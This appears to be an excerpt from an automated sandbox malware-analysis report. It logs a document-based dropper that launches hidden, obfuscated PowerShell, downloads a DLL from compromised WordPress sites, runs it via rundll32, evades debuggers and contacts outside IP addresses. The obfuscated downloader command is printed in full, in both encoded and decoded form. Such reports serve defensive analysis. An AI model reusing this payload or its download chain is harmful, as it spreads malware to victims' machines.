                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                      Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2512Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: rundll32.exe, 00000007.00000002.2097021006.000000000040D000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002460 RunDLL,LoadLibraryA,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWind
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007528 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10013BFB LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D76B2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A6AB2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E6AB2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00396AB2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00206AB2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001A6AB2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002876B2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002D76B2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001B6AB2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_006C76B2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_002476B2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_002B76B2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_001E76B2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004500 GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007528 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10009F26 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10006F64 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 202.187.222.40 80
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 184.66.18.83 80
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 167.71.148.58 187
                      Encrypted powershell cmdline option foundShow sources
                      Source: unknownProcess created: Base64 decoded $E3Sy = [TYPE]("{4}{3}{0}{1}{5}{2}"-f'M.Io.D','iRe','TORY','Ste','sy','C') ; SeT-ITEM VARIabLE:i7RpVz ([TYPE]("{1}{4}{2}{0}{6}{3}{7}{5}"-f 'ET.SeRVi','S','TEm.N','INT','yS','AnAgEr','CePo','M')) ;$Xsejjoo=('N'+('avc'+'lg')+'u');$Slfr1gp=$Rpb56t4 + [char](64) + $U9nybjs;$Wwuhcfs=(('U_m'+'4k')+'pq'); (gET-vARIaBle e3sY -vAlUeOn )::"CReaTEDire`c`ToRY"($HOME + (('Y'+'b'+'sR'+('g064'+'6rYbs'+'Q'+'9')+('0xm'+'rq'+'Yb')+'s') -REPlaCe ('Y'+'bs'),[cHAr]92));$K309qw1=(('Rq'+'rm')+('b2'+'8')); ( Ls variAble:i7rPvZ ).vaLUe::"SEcUri`TYpRo`TOc`ol" = (('Tls'+'1')+'2');$Nmh1wmf=(('X3b6'+'g')+'a'+'o');$Ojz_wa7 = ('M'+('8jkl'+'v4'));$Xgtwzgh=(('Cc'+'k0h')+'16');$Qqayu6h=('B'+('e6'+'f')+('r'+'w0'));$Jdgza5o=$HOME+(('{0'+'}Rg0646r'+'{'+'0}Q90'+'xmrq{'+'0}') -F [ChAR]92)+$Ojz_wa7+(('.'+'dl')+'l');$N05q5t5=('O'+('_'+'3'+'e2pf'));$Gkhm1tg=neW-Ob`j`ECT NeT.WEBClieNt;$Jkdys0o=(((('ht'+'t'+'p:J'+')(3s2)'))+('('+'J)(3s2'+')')+(('(zh'+'o'))+('ngs'+'h'+'ixingc'+'hua')+('n'+'g.')+'c'+'om'+(('J)(3s2'+')'))+'('+'wp'+('-'+'adminJ')+((')('))+(('3s'+'2)'))+(('(OTmJ'+')('+'3s'+'2)(@'))+('ht'+'t')+('p'+':J')+((')'+'(3s2'))+((')('+'J'))+((')('+'3s'))+'2'+((')('))+'w'+'w'+'w'+('.gre'+'a')+'u'+('ds'+'tu')+('d'+'io')+(('.c'+'omJ)'+'(3s'))+'2'+((')(d'+'o'+'cs'))+(('J'+')'+'(3s2)'))+(('(FGnJ'+')'+'('+'3'+'s2)(@http:J)('))+'3'+'s'+(('2)('+'J)'+'(3s'))+(('2)(k'+'o'))+'r'+('ea'+'nk'+'id')+('s'+'ed')+('u.c'+'om')+(('J)('+'3'))+'s2'+((')('+'wp-co'+'n'))+('ten'+'t')+(('J)'))+(('(3'+'s2)('))+('2c'+'Q')+(('Th
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $E3Sy = [TYPE]("{4}{3}{0}{1}{5}{2}"-f'M.Io.D','iRe','TORY','Ste','sy','C') ; SeT-ITEM VARIabLE:i7RpVz ([TYPE]("{1}{4}{2}{0}{6}{3}{7}{5}"-f 'ET.SeRVi','S','TEm.N','INT','yS','AnAgEr','CePo','M')) ;$Xsejjoo=('N'+('avc'+'lg')+'u');$Slfr1gp=$Rpb56t4 + [char](64) + $U9nybjs;$Wwuhcfs=(('U_m'+'4k')+'pq'); (gET-vARIaBle e3sY -vAlUeOn )::"CReaTEDire`c`ToRY"($HOME + (('Y'+'b'+'sR'+('g064'+'6rYbs'+'Q'+'9')+('0xm'+'rq'+'Yb')+'s') -REPlaCe ('Y'+'bs'),[cHAr]92));$K309qw1=(('Rq'+'rm')+('b2'+'8')); ( Ls variAble:i7rPvZ ).vaLUe::"SEcUri`TYpRo`TOc`ol" = (('Tls'+'1')+'2');$Nmh1wmf=(('X3b6'+'g')+'a'+'o');$Ojz_wa7 = ('M'+('8jkl'+'v4'));$Xgtwzgh=(('Cc'+'k0h')+'16');$Qqayu6h=('B'+('e6'+'f')+('r'+'w0'));$Jdgza5o=$HOME+(('{0'+'}Rg0646r'+'{'+'0}Q90'+'xmrq{'+'0}') -F [ChAR]92)+$Ojz_wa7+(('.'+'dl')+'l');$N05q5t5=('O'+('_'+'3'+'e2pf'));$Gkhm1tg=neW-Ob`j`ECT NeT.WEBClieNt;$Jkdys0o=(((('ht'+'t'+'p:J'+')(3s2)'))+('('+'J)(3s2'+')')+(('(zh'+'o'))+('ngs'+'h'+'ixingc'+'hua')+('n'+'g.')+'c'+'om'+(('J)(3s2'+')'))+'('+'wp'+('-'+'adminJ')+((')('))+(('3s'+'2)'))+(('(OTmJ'+')('+'3s'+'2)(@'))+('ht'+'t')+('p'+':J')+((')'+'(3s2'))+((')('+'J'))+((')('+'3s'))+'2'+((')('))+'w'+'w'+'w'+('.gre'+'a')+'u'+('ds'+'tu')+('d'+'io')+(('.c'+'omJ)'+'(3s'))+'2'+((')(d'+'o'+'cs'))+(('J'+')'+'(3s2)'))+(('(FGnJ'+')'+'('+'3'+'s2)(@http:J)('))+'3'+'s'+(('2)('+'J)'+'(3s'))+(('2)(k'+'o'))+'r'+('ea'+'nk'+'id')+('s'+'ed')+('u.c'+'om')+(('J)('+'3'))+'s2'+((')('+'wp-co'+'n'))+('ten'+'t')+(('J)'))+(('(3'+'s2)('))+('2c'+'Q')+(('Th
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEUAMwBTAHkAIAAgAD0AIABbAFQAWQBQAEUAXQAoACIAewA0AH0AewAzAH0AewAwAH0AewAxAH0AewA1AH0AewAyAH0AIgAtAGYAJwBNAC4ASQBvAC4ARAAnACwAJwBpAFIAZQAnACwAJwBUAE8AUgBZACcALAAnAFMAdABlACcALAAnAHMAeQAnACwAJwBDACcAKQAgADsAIAAgAFMAZQBUAC0ASQBUAEUATQAgAFYAQQBSAEkAYQBiAEwARQA6AGkANwBSAHAAVgB6ACAAIAAoAFsAVABZAFAARQBdACgAIgB7ADEAfQB7ADQAfQB7ADIAfQB7ADAAfQB7ADYAfQB7ADMAfQB7ADcAfQB7ADUAfQAiAC0AZgAgACcARQBUAC4AUwBlAFIAVgBpACcALAAnAFMAJwAsACcAVABFAG0ALgBOACcALAAnAEkATgBUACcALAAnAHkAUwAnACwAJwBBAG4AQQBnAEUAcgAnACwAJwBDAGUAUABvACcALAAnAE0AJwApACkAIAAgADsAJABYAHMAZQBqAGoAbwBvAD0AKAAnAE4AJwArACgAJwBhAHYAYwAnACsAJwBsAGcAJwApACsAJwB1ACcAKQA7ACQAUwBsAGYAcgAxAGcAcAA9ACQAUgBwAGIANQA2AHQANAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVQA5AG4AeQBiAGoAcwA7ACQAVwB3AHUAaABjAGYAcwA9ACgAKAAnAFUAXwBtACcAKwAnADQAawAnACkAKwAnAHAAcQAnACkAOwAgACAAKABnAEUAVAAtAHYAQQBSAEkAYQBCAGwAZQAgACAAZQAzAHMAWQAgAC0AdgBBAGwAVQBlAE8AbgAgACkAOgA6ACIAQwBSAGUAYQBUAEUARABpAHIAZQBgAGMAYABUAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWQAnACsAJwBiACcAKwAnAHMAUgAnACsAKAAnAGcAMAA2ADQAJwArACcANgByAFkAYgBzACcAKwAnAFEAJwArACcAOQAnACkAKwAoACcAMAB4AG0AJwArACcAcgBxACcAKwAnAFkAYgAnACkAKwAnAHMAJwApACAAIAAtAFIARQBQAGwAYQBDAGUAIAAoACcAWQAnACsAJwBiAHMAJwApACwAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQASwAzADAAOQBxAHcAMQA9ACgAKAAnAFIAcQAnACsAJwByAG0AJwApACsAKAAnAGIAMgAnACsAJwA4ACcAKQApADsAIAAoACAATABzACAAIAB2AGEAcgBpAEEAYgBsAGUAOgBpADcAcgBQAHYAWgAgACkALgB2AGEATABVAGUAOgA6ACIAUwBFAGMAVQByAGkAYABUAFkAcABSAG8AYABUAE8AYwBgAG8AbAAiACAAPQAgACgAKAAnAFQAbABzACcAKwAnADEAJwApACsAJwAyACcAKQA7ACQATgBtAGgAMQB3AG0AZgA9ACgAKAAnAFgAMwBiADYAJwArACcAZwAnACkAKwAnAGEAJwArACcAbwAnACkAOwAkAE8AagB6AF8AdwBhADcAIAA9ACAAKAAnAE0AJwArACgAJwA4AGoAawBsACcAKwAnAHYANAAnACkAKQA7ACQAWABnAHQAdwB6AGcAaAA9ACgAKAAnAEMAYwAnACsAJwBrADAAaAAnACkAKwAnADEANgAnACkAOwAkAFEAcQBhAHkAdQA2AGgAPQAoACcAQgAnACsAKAAnAGUANgAnACsAJwBmACcAKQArACgAJwByACcAKwAnAHcAMAAnACkAKQA7ACQASgBkAGcAegBhADUAbwA9ACQASABPAE0ARQArACgAKAAnAHsAMAAnACsAJwB9AFIAZwAwADYANAA2AHIAJwArACcAewAnACsAJwAwAH0AUQA5ADAAJwArACcAeABtAHIAcQB7ACcAKwAnADAAfQAnACkAIAAtAEYAIAAgAFsAQwBoAEEAUgBdADkAMgApACsAJABPAGoAegBfAHcAYQA3ACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQATgAwADUAcQA1AHQANQA9ACgAJwBPACcAKwAoACcAXwAnACsAJwAzACcAKwAnAGUAMgBwAGYAJwApACkAOwAkAEcAawBoAG0AMQB0AGcAPQBuAGUAVwAtAE8AYgBgAGoAYABFAEMAVAAgAE4AZQBUAC4AVwBFAEIAQwBsAGkAZQBOAHQAOwAkAEoAawBkAHkAcwAwAG8APQAoACgAKAAoACcAaAB0ACcAKwAnAHQAJwArACcAcAA6AEoAJwArACcAKQAoADMAcwAyACkAJwApACkAKwAoACcAKAAnACsAJwBKACkAKAAzAHMAMgAnACsAJwApACcAKQArACgAKAAnACgAegBoACcAKwAnAG8AJwApACkAKwAoACcAbgBnAHMAJwArACcAaAAnACsAJwBpAHgAaQBuAGcAYwAnACsAJwBoAHUAYQAnACkAKwAoACcAbgAnACsAJwBnAC4AJwApACsAJwBjACcAKwAnAG8AbQAnACsAKAAoACcASgApACgAMwBzADIAJwArACcAKQAnACkAKQArACcAKAAnACsAJwB3AHAAJwArACgAJwAtACcAKwAnAGEAZABtAGkAbgBKACcAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAJwApACkAKwAoACgAJwAoAE8AVABtAEoAJwArACcAKQAoACcAKwAnADMAcwAnACsAJwAyACkAKABAACcAKQApACsAKAAnAGgAdAAnACsAJwB0ACcAK
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll #1
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll #1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bjbj\rqtl.dgq',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Frxh\ggkviq.cnk',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zgwl\aiycp.wss',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cqxs\necppp.cgm',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oxpl\fwcrxow.muo',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pnjy\rwrr.fge',RunDLL
